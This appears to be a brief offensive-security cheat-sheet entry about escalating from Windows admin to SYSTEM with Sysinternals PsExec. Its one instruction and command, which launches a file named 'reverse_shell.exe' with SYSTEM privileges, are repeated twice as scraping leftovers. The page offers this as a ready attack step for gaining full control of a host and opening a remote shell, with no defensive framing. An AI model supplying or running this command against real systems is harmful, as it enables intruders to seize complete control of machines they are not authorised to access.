PSEXEC (admin to system)
PSEXEC.exe
To escalate from an admin user to full SYSTEM privileges, you can use the PsExec tool from Windows Sysinternals
PsExec64.exe -accepteula -i -s reverse_shell.exe
Last updated
To escalate from an admin user to full SYSTEM privileges, you can use the PsExec tool from Windows Sysinternals
PsExec64.exe -accepteula -i -s reverse_shell.exe
Last updated